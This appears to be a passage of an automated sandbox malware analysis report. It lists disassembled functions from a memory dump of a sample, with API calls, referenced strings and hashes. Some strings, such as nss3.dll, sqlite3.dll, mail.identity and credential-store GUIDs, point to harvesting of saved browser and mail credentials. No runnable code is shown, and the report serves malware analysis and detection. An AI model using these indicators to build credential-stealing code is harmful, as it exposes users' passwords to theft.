                                                      • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                      APIs
                                                      • memset.MSVCRT ref: 0040D2C2
                                                      • memset.MSVCRT ref: 0040D2D8
                                                      • memset.MSVCRT ref: 0040D2EA
                                                      • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                      • memset.MSVCRT ref: 0040D319
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset$memcpy
                                                      • String ID:
                                                      • API String ID: 368790112-0
                                                      • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                      • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                      • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                      • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                      APIs
                                                      Strings
                                                      • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                      • too many SQL variables, xrefs: 0042C6FD
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset
                                                      • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                      • API String ID: 2221118986-515162456
                                                      • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                      • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                      • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                      • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                      APIs
                                                        • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                      • memset.MSVCRT ref: 004026AD
                                                        • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                        • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                        • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                        • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                      • LocalFree.KERNEL32(?), ref: 004027A6
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                      • String ID:
                                                      • API String ID: 3503910906-0
                                                      • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                      • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                      • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                      • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                      APIs
                                                        • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000), ref: 00409E0E
                                                        • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 00409ED5
                                                      • strlen.MSVCRT ref: 0040B60B
                                                      • atoi.MSVCRT(?,00000000,?,75570A60,?,00000000), ref: 0040B619
                                                      • _mbsicmp.MSVCRT ref: 0040B66C
                                                      • _mbsicmp.MSVCRT ref: 0040B67F
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _mbsicmp$??2@??3@atoistrlen
                                                      • String ID:
                                                      • API String ID: 4107816708-0
                                                      • Opcode ID: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                      • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                      • Opcode Fuzzy Hash: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                      • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                      • _gmtime64.MSVCRT ref: 00411437
                                                      • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                      • strftime.MSVCRT ref: 00411476
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                      • String ID:
                                                      • API String ID: 1886415126-0
                                                      • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                      • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                      • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                      • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: strlen
                                                      • String ID: >$>$>
                                                      • API String ID: 39653677-3911187716
                                                      • Opcode ID: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                      • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                      • Opcode Fuzzy Hash: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                      • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                      APIs
                                                      • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                      • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                      • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpy
                                                      • String ID: @
                                                      • API String ID: 3510742995-2766056989
                                                      • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                      • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                      • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                      • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _strcmpi
                                                      • String ID: C@$mail.identity
                                                      • API String ID: 1439213657-721921413
                                                      • Opcode ID: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                      • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                      • Opcode Fuzzy Hash: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                      • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                      APIs
                                                      • memset.MSVCRT ref: 00406640
                                                        • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                        • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                        • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                      • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                      • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpy$memset$memcmp
                                                      • String ID: Ul@
                                                      • API String ID: 270934217-715280498
                                                      • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                      • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                      • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                      • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                      APIs
                                                        • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                      Strings
                                                      • recovered %d pages from %s, xrefs: 004188B4
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                      • String ID: recovered %d pages from %s
                                                      • API String ID: 985450955-1623757624
                                                      • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                      • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                      • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                      • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _ultoasprintf
                                                      • String ID: %s %s %s
                                                      • API String ID: 432394123-3850900253
                                                      • Opcode ID: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                      • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                      • Opcode Fuzzy Hash: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                      • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                      APIs
                                                      • LoadMenuA.USER32(00000000), ref: 00409078
                                                      • sprintf.MSVCRT ref: 0040909B
                                                        • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                        • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                        • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                        • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                        • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                        • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                        • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                      • String ID: menu_%d
                                                      • API String ID: 1129539653-2417748251
                                                      • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                      • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                      • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                      • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                      APIs
                                                      Strings
                                                      • failed memory resize %u to %u bytes, xrefs: 00411706
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _msizerealloc
                                                      • String ID: failed memory resize %u to %u bytes
                                                      • API String ID: 2713192863-2134078882
                                                      • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                      • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                      • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                      • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                      APIs
                                                      • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                        • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                        • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                      • _mbscat.MSVCRT ref: 004070FA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _mbscat$_mbscpystrlen
                                                      • String ID: sqlite3.dll
                                                      • API String ID: 1983510840-1155512374
                                                      • Opcode ID: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                      • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                      • Opcode Fuzzy Hash: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                      • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                      APIs
                                                      • GetWindowLongA.USER32(?,000000EC), ref: 004073D0
                                                      • SetWindowLongA.USER32(00000001,000000EC,00000000), ref: 004073E2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: LongWindow
                                                      • String ID: MZ@
                                                      • API String ID: 1378638983-2978689999
                                                      • Opcode ID: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                      • Instruction ID: af96c772fb3515a1af29397562e0ba089e4702b068c0c421cdc779d54beb7f6e
                                                      • Opcode Fuzzy Hash: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                      • Instruction Fuzzy Hash: 81C0123015D0166BCF101B24DC04E167E54B782321F208770B062E00F0C7704400A504
                                                      APIs
                                                      • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfileString
                                                      • String ID: A4@$Server Details
                                                      • API String ID: 1096422788-4071850762
                                                      • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                      • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                      • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                      • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                      APIs
                                                      • strlen.MSVCRT ref: 0040849A
                                                      • memset.MSVCRT ref: 004084D2
                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,7568EB20,?,00000000), ref: 0040858F
                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,7568EB20,?,00000000), ref: 004085BA
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: FreeLocalmemcpymemsetstrlen
                                                      • String ID:
                                                      • API String ID: 3110682361-0
                                                      • Opcode ID: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                      • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                      • Opcode Fuzzy Hash: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                      • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                      APIs
                                                      • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                      • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                      • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpy
                                                      • String ID:
                                                      • API String ID: 3510742995-0
                                                      • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                      • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                      • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                      • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8